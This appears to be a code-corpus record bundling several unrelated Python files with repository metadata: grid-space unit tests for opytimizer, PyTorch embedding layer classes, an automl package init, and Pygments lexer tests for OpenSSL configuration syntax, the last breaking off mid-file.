| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
9fb5ded4a3dfc6b325b348d6e8ebdec4b7d2df60
| 1,277
|
py
|
Python
|
tests/opytimizer/spaces/test_grid.py
|
anukaal/opytimizer
|
5f1ccc0da80e6a4cabd99578fa24cf4f6466f9b9
|
[
"Apache-2.0"
] | 528
|
2018-10-01T20:00:09.000Z
|
2022-03-27T11:15:31.000Z
|
tests/opytimizer/spaces/test_grid.py
|
anukaal/opytimizer
|
5f1ccc0da80e6a4cabd99578fa24cf4f6466f9b9
|
[
"Apache-2.0"
] | 17
|
2019-10-30T00:47:03.000Z
|
2022-03-21T11:39:28.000Z
|
tests/opytimizer/spaces/test_grid.py
|
anukaal/opytimizer
|
5f1ccc0da80e6a4cabd99578fa24cf4f6466f9b9
|
[
"Apache-2.0"
] | 35
|
2018-10-01T20:03:23.000Z
|
2022-03-20T03:54:15.000Z
|
import numpy as np
from opytimizer.spaces import grid
def test_grid_space_step():
new_grid_space = grid.GridSpace(1, 0.1, 0, 1)
assert new_grid_space.step == 0.1
def test_grid_space_step_setter():
new_grid_space = grid.GridSpace(1, 0.1, 0, 1)
try:
new_grid_space.step = 'a'
except:
new_grid_space.step = np.array([0.1])
assert new_grid_space.step == 0.1
try:
new_grid_space.step = np.array([0.1, 0.1])
except:
new_grid_space.step = np.array([0.1])
assert new_grid_space.step == 0.1
def test_grid_space_grid():
new_grid_space = grid.GridSpace(1, 0.1, 0, 1)
assert len(new_grid_space.grid) == 11
def test_grid_space_terminals_setter():
try:
new_grid_space = grid.GridSpace(1, 0.1, 0, 1)
new_grid_space.grid = 'a'
except:
new_grid_space = grid.GridSpace(1, 0.1, 0, 1)
new_grid_space.grid = np.array([1, 1])
assert len(new_grid_space.grid) == 2
def test_grid_create_grid():
new_grid_space = grid.GridSpace(1, 0.1, 0, 1)
new_grid_space._create_grid()
assert len(new_grid_space.grid) == 11
def test_grid_initialize_agents():
new_grid_space = grid.GridSpace(1, 0.1, 0, 1)
assert new_grid_space.agents[0].position[0] != 1
| 21.644068
| 53
| 0.654659
| 217
| 1,277
| 3.557604
| 0.138249
| 0.291451
| 0.326425
| 0.248705
| 0.812176
| 0.770725
| 0.770725
| 0.708549
| 0.676166
| 0.676166
| 0
| 0.059178
| 0.219264
| 1,277
| 58
| 54
| 22.017241
| 0.715145
| 0
| 0
| 0.571429
| 0
| 0
| 0.001566
| 0
| 0
| 0
| 0
| 0
| 0.2
| 1
| 0.171429
| false
| 0
| 0.057143
| 0
| 0.228571
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
9fc3ff215ec8aab83d370f28e8cb17ca61bd0dce
| 2,737
|
py
|
Python
|
src/embedding.py
|
HKUST-KnowComp/NeuralSubIsoCnt
|
7d1deef8e49af90122ea0ad099dec1de390927b6
|
[
"MIT"
] | 28
|
2020-06-20T14:45:27.000Z
|
2022-02-18T06:54:53.000Z
|
src/embedding.py
|
HKUST-KnowComp/NeuralSubIsoCnt
|
7d1deef8e49af90122ea0ad099dec1de390927b6
|
[
"MIT"
] | 5
|
2020-08-04T04:11:17.000Z
|
2021-05-27T13:11:22.000Z
|
src/embedding.py
|
HKUST-KnowComp/NeuralSubIsoCnt
|
7d1deef8e49af90122ea0ad099dec1de390927b6
|
[
"MIT"
] | 5
|
2020-08-25T05:02:18.000Z
|
2021-07-16T06:31:31.000Z
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from utils import extend_dimensions
class NormalEmbedding(nn.Module):
def __init__(self, input_dim, emb_dim):
super(NormalEmbedding, self).__init__()
self.input_dim = input_dim
self.emb_dim = emb_dim
self.emb_layer = nn.Linear(input_dim, emb_dim, bias=False)
# init
nn.init.normal_(self.emb_layer.weight, 0.0, 1.0)
def increase_input_size(self, new_input_dim):
assert new_input_dim >= self.input_dim
if new_input_dim != self.input_dim:
new_emb_layer = extend_dimensions(self.emb_layer, new_input_dim=new_input_dim, upper=False)
del self.emb_layer
self.emb_layer = new_emb_layer
self.input_dim = new_input_dim
def forward(self, x):
emb = self.emb_layer(x)
return emb
class OrthogonalEmbedding(nn.Module):
def __init__(self, input_dim, emb_dim):
super(OrthogonalEmbedding, self).__init__()
self.input_dim = input_dim
self.emb_dim = emb_dim
self.emb_layer = nn.Linear(input_dim, emb_dim, bias=False)
# init
nn.init.orthogonal_(self.emb_layer.weight)
def increase_input_size(self, new_input_dim):
assert new_input_dim >= self.input_dim
if new_input_dim != self.input_dim:
new_emb_layer = extend_dimensions(self.emb_layer, new_input_dim=new_input_dim, upper=False)
del self.emb_layer
self.emb_layer = new_emb_layer
self.input_dim = new_input_dim
def forward(self, x):
emb = self.emb_layer(x)
return emb
class EquivariantEmbedding(nn.Module):
def __init__(self, input_dim, emb_dim):
super(EquivariantEmbedding, self).__init__()
self.input_dim = input_dim
self.emb_dim = emb_dim
self.emb_layer = nn.Linear(input_dim, emb_dim, bias=False)
# init
nn.init.normal_(self.emb_layer.weight[:,0], 0.0, 1.0)
emb_column = self.emb_layer.weight[:,0]
with torch.no_grad():
for i in range(1, self.input_dim):
self.emb_layer.weight[:,i].data.copy_(torch.roll(emb_column, i, 0))
def increase_input_size(self, new_input_dim):
assert new_input_dim >= self.input_dim
if new_input_dim != self.input_dim:
new_emb_layer = extend_dimensions(self.emb_layer, new_input_dim=new_input_dim, upper=False)
del self.emb_layer
self.emb_layer = new_emb_layer
self.input_dim = new_input_dim
def forward(self, x):
emb = self.emb_layer(x)
return emb
| 36.493333
| 104
| 0.635002
| 386
| 2,737
| 4.132124
| 0.134715
| 0.200627
| 0.15047
| 0.060188
| 0.796865
| 0.784953
| 0.784953
| 0.784953
| 0.784953
| 0.784953
| 0
| 0.006054
| 0.275849
| 2,737
| 75
| 105
| 36.493333
| 0.798688
| 0.005115
| 0
| 0.711864
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.050847
| 1
| 0.152542
| false
| 0
| 0.067797
| 0
| 0.322034
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e225b4af018d175076e6fb5e191447f86b9f1af1
| 118
|
py
|
Python
|
automl_infrastructure/pipeline/__init__.py
|
barak1412/automl_infrastructure
|
e8a291d175237bb7f74ebae5d6f5d2f8bcf5dc32
|
[
"MIT"
] | null | null | null |
automl_infrastructure/pipeline/__init__.py
|
barak1412/automl_infrastructure
|
e8a291d175237bb7f74ebae5d6f5d2f8bcf5dc32
|
[
"MIT"
] | null | null | null |
automl_infrastructure/pipeline/__init__.py
|
barak1412/automl_infrastructure
|
e8a291d175237bb7f74ebae5d6f5d2f8bcf5dc32
|
[
"MIT"
] | null | null | null |
from automl_infrastructure.pipeline.base import Pipeline
from automl_infrastructure.pipeline.steps.base import Step
| 23.6
| 58
| 0.872881
| 15
| 118
| 6.733333
| 0.533333
| 0.19802
| 0.475248
| 0.633663
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.084746
| 118
| 4
| 59
| 29.5
| 0.935185
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e24489a69ed9d22d78fd5edee09268dd1e8dac2e
| 25,609
|
py
|
Python
|
tests/test_lexer.py
|
stefanholek/pygments-openssl
|
26c530dce2f175c3c3e65b96af21a8ee5423dc99
|
[
"BSD-2-Clause"
] | 2
|
2015-02-22T08:22:07.000Z
|
2015-10-16T13:53:06.000Z
|
tests/test_lexer.py
|
stefanholek/pygments-openssl
|
26c530dce2f175c3c3e65b96af21a8ee5423dc99
|
[
"BSD-2-Clause"
] | null | null | null |
tests/test_lexer.py
|
stefanholek/pygments-openssl
|
26c530dce2f175c3c3e65b96af21a8ee5423dc99
|
[
"BSD-2-Clause"
] | null | null | null |
import unittest
from pygments_openssl.lexer import T_SPACE
class LexerTests(unittest.TestCase):
def lex(self, code, lexer_name):
from pygments import lex, lexers
return list(lex(code, lexers.get_lexer_by_name(lexer_name)))
def test_lex_comment(self):
from pygments import token
tokens = self.lex('# Comment\n', 'openssl')
self.assertEqual(tokens[0], (token.Comment, '# Comment'))
self.assertEqual(tokens[1], (T_SPACE, '\n'))
tokens = self.lex('# Comment\n', 'ini')
self.assertEqual(tokens[0], (token.Comment.Single, '# Comment'))
self.assertEqual(tokens[1], (T_SPACE, '\n'))
tokens = self.lex('# Comment\n', 'bash')
self.assertEqual(tokens[0], (token.Comment.Single, '# Comment\n'))
def test_lex_section_header(self):
from pygments import token
tokens = self.lex('[ default ]\n', 'openssl')
self.assertEqual(tokens[0], (token.Keyword, '[ default ]'))
self.assertEqual(tokens[1], (T_SPACE, '\n'))
tokens = self.lex('[ default ]\n', 'ini')
self.assertEqual(tokens[0], (token.Keyword, '[ default ]'))
self.assertEqual(tokens[1], (T_SPACE, '\n'))
def test_lex_lhs_and_operator(self):
from pygments import token
tokens = self.lex('dir = .\n', 'openssl')
self.assertEqual(tokens[0], (token.Name.Attribute, 'dir'))
self.assertEqual(tokens[1], (T_SPACE, ' '))
self.assertEqual(tokens[2], (token.Operator, '='))
self.assertEqual(tokens[3], (T_SPACE, ' '))
tokens = self.lex('dir = .\n', 'ini')
self.assertEqual(tokens[0], (token.Name.Attribute, 'dir'))
self.assertEqual(tokens[1], (T_SPACE, ' '))
self.assertEqual(tokens[2], (token.Operator, '='))
self.assertEqual(tokens[3], (T_SPACE, ' '))
def test_lex_lhs_line_continuation(self):
from pygments import token
tokens = self.lex('dir \\\n = .\n', 'openssl')
self.assertEqual(tokens[0], (token.Name.Attribute, 'dir'))
self.assertEqual(tokens[1], (T_SPACE, ' '))
self.assertEqual(tokens[2], (token.String.Escape, '\\'))
self.assertEqual(tokens[3], (T_SPACE, '\n '))
self.assertEqual(tokens[4], (token.Operator, '='))
self.assertEqual(tokens[5], (T_SPACE, ' '))
def test_lex_rhs_line_continuation(self):
from pygments import token
tokens = self.lex('dir = \\\n.\n', 'openssl')
self.assertEqual(tokens[0], (token.Name.Attribute, 'dir'))
self.assertEqual(tokens[1], (T_SPACE, ' '))
self.assertEqual(tokens[2], (token.Operator, '='))
self.assertEqual(tokens[3], (T_SPACE, ' '))
self.assertEqual(tokens[4], (token.String.Escape, '\\'))
self.assertEqual(tokens[5], (T_SPACE, '\n'))
def test_lex_rhs_string(self):
from pygments import token
tokens = self.lex('dir = .\n', 'openssl')
self.assertEqual(tokens[0], (token.Name.Attribute, 'dir'))
self.assertEqual(tokens[1], (T_SPACE, ' '))
self.assertEqual(tokens[2], (token.Operator, '='))
self.assertEqual(tokens[3], (T_SPACE, ' '))
self.assertEqual(tokens[4], (token.String, '.'))
self.assertEqual(tokens[5], (T_SPACE, '\n'))
tokens = self.lex('dir = .\n', 'ini')
self.assertEqual(tokens[0], (token.Name.Attribute, 'dir'))
self.assertEqual(tokens[1], (T_SPACE, ' '))
self.assertEqual(tokens[2], (token.Operator, '='))
self.assertEqual(tokens[3], (T_SPACE, ' '))
self.assertEqual(tokens[4], (token.String, '.'))
self.assertEqual(tokens[5], (T_SPACE, '\n'))
def test_lex_rhs_comment(self):
from pygments import token
tokens = self.lex('dir = . # Comment\n', 'openssl')
self.assertEqual(tokens[0], (token.Name.Attribute, 'dir'))
self.assertEqual(tokens[1], (T_SPACE, ' '))
self.assertEqual(tokens[2], (token.Operator, '='))
self.assertEqual(tokens[3], (T_SPACE, ' '))
self.assertEqual(tokens[4], (token.String, '.'))
self.assertEqual(tokens[5], (T_SPACE, ' '))
self.assertEqual(tokens[6], (token.Comment, '# Comment'))
self.assertEqual(tokens[7], (T_SPACE, '\n'))
tokens = self.lex('dir = . # Comment\n', 'ini')
self.assertEqual(tokens[0], (token.Name.Attribute, 'dir'))
self.assertEqual(tokens[1], (T_SPACE, ' '))
self.assertEqual(tokens[2], (token.Operator, '='))
self.assertEqual(tokens[3], (T_SPACE, ' '))
self.assertEqual(tokens[4], (token.String, '. # Comment'))
self.assertEqual(tokens[5], (T_SPACE, '\n'))
def test_lex_rhs_double_quoted_string(self):
from pygments import token
tokens = self.lex('dir = "foo bar"\n', 'openssl')
self.assertEqual(tokens[0], (token.Name.Attribute, 'dir'))
self.assertEqual(tokens[1], (T_SPACE, ' '))
self.assertEqual(tokens[2], (token.Operator, '='))
self.assertEqual(tokens[3], (T_SPACE, ' '))
self.assertEqual(tokens[4], (token.String.Double, '"foo bar"'))
self.assertEqual(tokens[5], (T_SPACE, '\n'))
tokens = self.lex('dir = "foo bar"\n', 'ini')
self.assertEqual(tokens[0], (token.Name.Attribute, 'dir'))
self.assertEqual(tokens[1], (T_SPACE, ' '))
self.assertEqual(tokens[2], (token.Operator, '='))
self.assertEqual(tokens[3], (T_SPACE, ' '))
self.assertEqual(tokens[4], (token.String, '"foo bar"'))
self.assertEqual(tokens[5], (T_SPACE, '\n'))
def test_lex_rhs_single_quoted_string(self):
from pygments import token
tokens = self.lex("dir = 'foo bar'\n", 'openssl')
self.assertEqual(tokens[0], (token.Name.Attribute, 'dir'))
self.assertEqual(tokens[1], (T_SPACE, ' '))
self.assertEqual(tokens[2], (token.Operator, '='))
self.assertEqual(tokens[3], (T_SPACE, ' '))
self.assertEqual(tokens[4], (token.String.Single, "'foo bar'"))
self.assertEqual(tokens[5], (T_SPACE, '\n'))
tokens = self.lex("dir = 'foo bar'\n", 'ini')
self.assertEqual(tokens[0], (token.Name.Attribute, 'dir'))
self.assertEqual(tokens[1], (T_SPACE, ' '))
self.assertEqual(tokens[2], (token.Operator, '='))
self.assertEqual(tokens[3], (T_SPACE, ' '))
self.assertEqual(tokens[4], (token.String, "'foo bar'"))
self.assertEqual(tokens[5], (T_SPACE, '\n'))
def test_lex_rhs_variable_name(self):
from pygments import token
tokens = self.lex('foo = $variable\n', 'openssl')
self.assertEqual(tokens[0], (token.Name.Attribute, 'foo'))
self.assertEqual(tokens[1], (T_SPACE, ' '))
self.assertEqual(tokens[2], (token.Operator, '='))
self.assertEqual(tokens[3], (T_SPACE, ' '))
self.assertEqual(tokens[4], (token.Name.Variable, '$variable'))
self.assertEqual(tokens[5], (T_SPACE, '\n'))
def test_lex_rhs_variable_name_curly_braces(self):
from pygments import token
tokens = self.lex('foo = ${ENV::variable}\n', 'openssl')
self.assertEqual(tokens[0], (token.Name.Attribute, 'foo'))
self.assertEqual(tokens[1], (T_SPACE, ' '))
self.assertEqual(tokens[2], (token.Operator, '='))
self.assertEqual(tokens[3], (T_SPACE, ' '))
self.assertEqual(tokens[4], (token.Name.Variable, '${ENV::variable}'))
self.assertEqual(tokens[5], (T_SPACE, '\n'))
def test_lex_rhs_variable_name_parentheses(self):
from pygments import token
tokens = self.lex('foo = $(ENV::variable)\n', 'openssl')
self.assertEqual(tokens[0], (token.Name.Attribute, 'foo'))
self.assertEqual(tokens[1], (T_SPACE, ' '))
self.assertEqual(tokens[2], (token.Operator, '='))
self.assertEqual(tokens[3], (T_SPACE, ' '))
self.assertEqual(tokens[4], (token.Name.Variable, '$(ENV::variable)'))
self.assertEqual(tokens[5], (T_SPACE, '\n'))
def test_lex_rhs_oid(self):
from pygments import token
tokens = self.lex('oid = 1.2.3.4.5\n', 'openssl')
self.assertEqual(tokens[0], (token.Name.Attribute, 'oid'))
self.assertEqual(tokens[1], (T_SPACE, ' '))
self.assertEqual(tokens[2], (token.Operator, '='))
self.assertEqual(tokens[3], (T_SPACE, ' '))
self.assertEqual(tokens[4], (token.Name.Function, '1.2.3.4.5'))
self.assertEqual(tokens[5], (T_SPACE, '\n'))
def test_lex_rhs_number(self):
from pygments import token
tokens = self.lex('num = 12\n', 'openssl')
self.assertEqual(tokens[0], (token.Name.Attribute, 'num'))
self.assertEqual(tokens[1], (T_SPACE, ' '))
self.assertEqual(tokens[2], (token.Operator, '='))
self.assertEqual(tokens[3], (T_SPACE, ' '))
self.assertEqual(tokens[4], (token.String, '12'))
self.assertEqual(tokens[5], (T_SPACE, '\n'))
def test_lex_rhs_section_reference(self):
from pygments import token
tokens = self.lex('foo = @section\n', 'openssl')
self.assertEqual(tokens[0], (token.Name.Attribute, 'foo'))
self.assertEqual(tokens[1], (T_SPACE, ' '))
self.assertEqual(tokens[2], (token.Operator, '='))
self.assertEqual(tokens[3], (T_SPACE, ' '))
self.assertEqual(tokens[4], (token.Name.Constant, '@section'))
self.assertEqual(tokens[5], (T_SPACE, '\n'))
def test_lex_rhs_critical_keyword(self):
from pygments import token
tokens = self.lex('foo = critical,bar\n', 'openssl')
self.assertEqual(tokens[0], (token.Name.Attribute, 'foo'))
self.assertEqual(tokens[1], (T_SPACE, ' '))
self.assertEqual(tokens[2], (token.Operator, '='))
self.assertEqual(tokens[3], (T_SPACE, ' '))
self.assertEqual(tokens[4], (token.Keyword.Pseudo, 'critical'))
self.assertEqual(tokens[5], (token.String, ',bar'))
self.assertEqual(tokens[6], (T_SPACE, '\n'))
def test_lex_incomplete_lhs(self):
from pygments import token
tokens = self.lex('dir\ndir = .\n', 'openssl')
self.assertEqual(tokens[0], (token.Name.Attribute, 'dir'))
self.assertEqual(tokens[1], (T_SPACE, '\n'))
self.assertEqual(tokens[2], (token.Name.Attribute, 'dir'))
self.assertEqual(tokens[3], (T_SPACE, ' '))
self.assertEqual(tokens[4], (token.Operator, '='))
self.assertEqual(tokens[5], (T_SPACE, ' '))
self.assertEqual(tokens[6], (token.String, '.'))
self.assertEqual(tokens[7], (T_SPACE, '\n'))
def test_lex_incomplete_lhs_and_operator(self):
from pygments import token
tokens = self.lex('dir =\ndir = .\n', 'openssl')
self.assertEqual(tokens[0], (token.Name.Attribute, 'dir'))
self.assertEqual(tokens[1], (T_SPACE, ' '))
self.assertEqual(tokens[2], (token.Operator, '='))
self.assertEqual(tokens[3], (T_SPACE, '\n'))
self.assertEqual(tokens[4], (token.Name.Attribute, 'dir'))
self.assertEqual(tokens[5], (T_SPACE, ' '))
self.assertEqual(tokens[6], (token.Operator, '='))
self.assertEqual(tokens[7], (T_SPACE, ' '))
self.assertEqual(tokens[8], (token.String, '.'))
self.assertEqual(tokens[9], (T_SPACE, '\n'))
def test_lex_incomplete_lhs_string(self):
from pygments import token
tokens = self.lex('dir', 'openssl')
self.assertEqual(tokens[0], (token.Name.Attribute, 'dir'))
def test_lex_missing_lhs(self):
from pygments import token
tokens = self.lex('= foo\ndir = .\n', 'openssl')
self.assertEqual(tokens[0], (token.Operator, '='))
self.assertEqual(tokens[1], (T_SPACE, ' '))
self.assertEqual(tokens[2], (token.String, 'foo'))
self.assertEqual(tokens[3], (T_SPACE, '\n'))
self.assertEqual(tokens[4], (token.Name.Attribute, 'dir'))
self.assertEqual(tokens[5], (T_SPACE, ' '))
self.assertEqual(tokens[6], (token.Operator, '='))
self.assertEqual(tokens[7], (T_SPACE, ' '))
self.assertEqual(tokens[8], (token.String, '.'))
self.assertEqual(tokens[9], (T_SPACE, '\n'))
class DirectiveLexerTests(unittest.TestCase):
def lex(self, code, lexer_name):
from pygments import lex, lexers
return list(lex(code, lexers.get_lexer_by_name(lexer_name)))
def test_lex_directive(self):
from pygments import token
tokens = self.lex('.directive foo\n', 'openssl')
self.assertEqual(tokens[0], (token.Name.Attribute, '.directive'))
self.assertEqual(tokens[1], (T_SPACE, ' '))
self.assertEqual(tokens[2], (token.String, 'foo'))
self.assertEqual(tokens[3], (T_SPACE, '\n'))
def test_lex_directive_and_operator(self):
from pygments import token
tokens = self.lex('.directive = foo\n', 'openssl')
self.assertEqual(tokens[0], (token.Name.Attribute, '.directive'))
self.assertEqual(tokens[1], (T_SPACE, ' '))
self.assertEqual(tokens[2], (token.Operator, '='))
self.assertEqual(tokens[3], (T_SPACE, ' '))
self.assertEqual(tokens[4], (token.String, 'foo'))
self.assertEqual(tokens[5], (T_SPACE, '\n'))
def test_lex_directive_with_leading_whitespace(self):
from pygments import token
tokens = self.lex(' .directive foo\n', 'openssl')
self.assertEqual(tokens[0], (T_SPACE, ' '))
self.assertEqual(tokens[1], (token.Name.Attribute, '.directive'))
self.assertEqual(tokens[2], (T_SPACE, ' '))
self.assertEqual(tokens[3], (token.String, 'foo'))
self.assertEqual(tokens[4], (T_SPACE, '\n'))
def test_lex_incomplete_directive(self):
from pygments import token
tokens = self.lex('.directive\n', 'openssl')
self.assertEqual(tokens[0], (token.Name.Attribute, '.directive'))
self.assertEqual(tokens[1], (T_SPACE, '\n'))
tokens = self.lex('.directive\n.directive foo\n', 'openssl')
self.assertEqual(tokens[0], (token.Name.Attribute, '.directive'))
self.assertEqual(tokens[1], (T_SPACE, '\n'))
self.assertEqual(tokens[2], (token.Name.Attribute, '.directive'))
self.assertEqual(tokens[3], (T_SPACE, ' '))
self.assertEqual(tokens[4], (token.String, 'foo'))
self.assertEqual(tokens[5], (T_SPACE, '\n'))
def test_lex_incomplete_directive_and_operator(self):
from pygments import token
tokens = self.lex('.directive =\n', 'openssl')
self.assertEqual(tokens[0], (token.Name.Attribute, '.directive'))
self.assertEqual(tokens[1], (T_SPACE, ' '))
self.assertEqual(tokens[2], (token.Operator, '='))
self.assertEqual(tokens[3], (T_SPACE, '\n'))
tokens = self.lex('.directive =\n.directive = foo\n', 'openssl')
self.assertEqual(tokens[0], (token.Name.Attribute, '.directive'))
self.assertEqual(tokens[1], (T_SPACE, ' '))
self.assertEqual(tokens[2], (token.Operator, '='))
self.assertEqual(tokens[3], (T_SPACE, '\n'))
self.assertEqual(tokens[4], (token.Name.Attribute, '.directive'))
self.assertEqual(tokens[5], (T_SPACE, ' '))
self.assertEqual(tokens[6], (token.Operator, '='))
self.assertEqual(tokens[7], (T_SPACE, ' '))
self.assertEqual(tokens[8], (token.String, 'foo'))
self.assertEqual(tokens[9], (T_SPACE, '\n'))
def test_lex_incomplete_directive_string(self):
from pygments import token
tokens = self.lex('.directive', 'openssl')
self.assertEqual(tokens[0], (token.Name.Attribute, '.directive'))
tokens = self.lex('.directive\n.directive foo', 'openssl')
self.assertEqual(tokens[0], (token.Name.Attribute, '.directive'))
self.assertEqual(tokens[1], (T_SPACE, '\n'))
self.assertEqual(tokens[2], (token.Name.Attribute, '.directive'))
self.assertEqual(tokens[3], (T_SPACE, ' '))
self.assertEqual(tokens[4], (token.String, 'foo'))
class PragmaDirectiveLexerTests(unittest.TestCase):
def lex(self, code, lexer_name):
from pygments import lex, lexers
return list(lex(code, lexers.get_lexer_by_name(lexer_name)))
def test_lex_pragma_directive(self):
from pygments import token
tokens = self.lex('.pragma foo\n', 'openssl')
self.assertEqual(tokens[0], (token.Name.Builtin, '.pragma'))
self.assertEqual(tokens[1], (T_SPACE, ' '))
self.assertEqual(tokens[2], (token.String, 'foo'))
self.assertEqual(tokens[3], (T_SPACE, '\n'))
def test_lex_pragma_directive_and_operator(self):
from pygments import token
tokens = self.lex('.pragma = foo\n', 'openssl')
self.assertEqual(tokens[0], (token.Name.Builtin, '.pragma'))
self.assertEqual(tokens[1], (T_SPACE, ' '))
self.assertEqual(tokens[2], (token.Operator, '='))
self.assertEqual(tokens[3], (T_SPACE, ' '))
self.assertEqual(tokens[4], (token.String, 'foo'))
self.assertEqual(tokens[5], (T_SPACE, '\n'))
def test_lex_pragme_directive_with_leading_whitespace(self):
from pygments import token
tokens = self.lex(' .pragma foo\n', 'openssl')
self.assertEqual(tokens[0], (T_SPACE, ' '))
self.assertEqual(tokens[1], (token.Name.Builtin, '.pragma'))
self.assertEqual(tokens[2], (T_SPACE, ' '))
self.assertEqual(tokens[3], (token.String, 'foo'))
self.assertEqual(tokens[4], (T_SPACE, '\n'))
def test_lex_pragma_directive_name(self):
from pygments import token
tokens = self.lex('.pragma abspath:\n', 'openssl')
self.assertEqual(tokens[0], (token.Name.Builtin, '.pragma'))
self.assertEqual(tokens[1], (T_SPACE, ' '))
self.assertEqual(tokens[2], (token.Keyword.Pseudo, 'abspath'))
self.assertEqual(tokens[3], (token.Operator, ':'))
def test_lex_pragma_directive_name_and_operator(self):
from pygments import token
tokens = self.lex('.pragma = abspath:\n', 'openssl')
self.assertEqual(tokens[0], (token.Name.Builtin, '.pragma'))
self.assertEqual(tokens[1], (T_SPACE, ' '))
self.assertEqual(tokens[2], (token.Operator, '='))
self.assertEqual(tokens[3], (T_SPACE, ' '))
self.assertEqual(tokens[4], (token.Keyword.Pseudo, 'abspath'))
self.assertEqual(tokens[5], (token.Operator, ':'))
def test_lex_pragma_directive_name_and_value(self):
from pygments import token
tokens = self.lex('.pragma abspath:bar\n', 'openssl')
self.assertEqual(tokens[0], (token.Name.Builtin, '.pragma'))
self.assertEqual(tokens[1], (T_SPACE, ' '))
self.assertEqual(tokens[2], (token.Keyword.Pseudo, 'abspath'))
self.assertEqual(tokens[3], (token.Operator, ':'))
self.assertEqual(tokens[4], (token.String, 'bar'))
self.assertEqual(tokens[5], (T_SPACE, '\n'))
def test_lex_pragma_directive_name_and_value_with_colon(self):
from pygments import token
tokens = self.lex('.pragma abspath:bar:baz\n', 'openssl')
self.assertEqual(tokens[0], (token.Name.Builtin, '.pragma'))
self.assertEqual(tokens[1], (T_SPACE, ' '))
self.assertEqual(tokens[2], (token.Keyword.Pseudo, 'abspath'))
self.assertEqual(tokens[3], (token.Operator, ':'))
self.assertEqual(tokens[4], (token.String, 'bar:baz'))
self.assertEqual(tokens[5], (T_SPACE, '\n'))
def test_lex_incomplete_pragma_directive(self):
from pygments import token
tokens = self.lex('.pragma\n', 'openssl')
self.assertEqual(tokens[0], (token.Name.Builtin, '.pragma'))
self.assertEqual(tokens[1], (T_SPACE, '\n'))
tokens = self.lex('.pragma\n.pragma foo\n', 'openssl')
self.assertEqual(tokens[0], (token.Name.Builtin, '.pragma'))
self.assertEqual(tokens[1], (T_SPACE, '\n'))
self.assertEqual(tokens[2], (token.Name.Builtin, '.pragma'))
self.assertEqual(tokens[3], (T_SPACE, ' '))
self.assertEqual(tokens[4], (token.String, 'foo'))
self.assertEqual(tokens[5], (T_SPACE, '\n'))
def test_lex_incomplete_pragma_directive_and_operator(self):
from pygments import token
tokens = self.lex('.pragma =\n', 'openssl')
self.assertEqual(tokens[0], (token.Name.Builtin, '.pragma'))
self.assertEqual(tokens[1], (T_SPACE, ' '))
self.assertEqual(tokens[2], (token.Operator, '='))
self.assertEqual(tokens[3], (T_SPACE, '\n'))
tokens = self.lex('.pragma =\n.pragma = foo\n', 'openssl')
self.assertEqual(tokens[0], (token.Name.Builtin, '.pragma'))
self.assertEqual(tokens[1], (T_SPACE, ' '))
self.assertEqual(tokens[2], (token.Operator, '='))
self.assertEqual(tokens[3], (T_SPACE, '\n'))
self.assertEqual(tokens[4], (token.Name.Builtin, '.pragma'))
self.assertEqual(tokens[5], (T_SPACE, ' '))
self.assertEqual(tokens[6], (token.Operator, '='))
self.assertEqual(tokens[7], (T_SPACE, ' '))
self.assertEqual(tokens[8], (token.String, 'foo'))
self.assertEqual(tokens[9], (T_SPACE, '\n'))
def test_lex_incomplete_pragma_directive_string(self):
from pygments import token
tokens = self.lex('.pragma', 'openssl')
self.assertEqual(tokens[0], (token.Name.Builtin, '.pragma'))
tokens = self.lex('.pragma\n.pragma foo', 'openssl')
self.assertEqual(tokens[0], (token.Name.Builtin, '.pragma'))
self.assertEqual(tokens[1], (T_SPACE, '\n'))
self.assertEqual(tokens[2], (token.Name.Builtin, '.pragma'))
self.assertEqual(tokens[3], (T_SPACE, ' '))
self.assertEqual(tokens[4], (token.String, 'foo'))
class IncludeDirectiveLexerTests(unittest.TestCase):
def lex(self, code, lexer_name):
from pygments import lex, lexers
return list(lex(code, lexers.get_lexer_by_name(lexer_name)))
def test_lex_include_directive(self):
from pygments import token
tokens = self.lex('.include foo\n', 'openssl')
self.assertEqual(tokens[0], (token.Name.Builtin, '.include'))
self.assertEqual(tokens[1], (T_SPACE, ' '))
self.assertEqual(tokens[2], (token.String, 'foo'))
self.assertEqual(tokens[3], (T_SPACE, '\n'))
def test_lex_include_directive_and_operator(self):
from pygments import token
tokens = self.lex('.include = foo\n', 'openssl')
self.assertEqual(tokens[0], (token.Name.Builtin, '.include'))
self.assertEqual(tokens[1], (T_SPACE, ' '))
self.assertEqual(tokens[2], (token.Operator, '='))
self.assertEqual(tokens[3], (T_SPACE, ' '))
self.assertEqual(tokens[4], (token.String, 'foo'))
self.assertEqual(tokens[5], (T_SPACE, '\n'))
def test_lex_pragme_directive_with_leading_whitespace(self):
from pygments import token
tokens = self.lex(' .include foo\n', 'openssl')
self.assertEqual(tokens[0], (T_SPACE, ' '))
self.assertEqual(tokens[1], (token.Name.Builtin, '.include'))
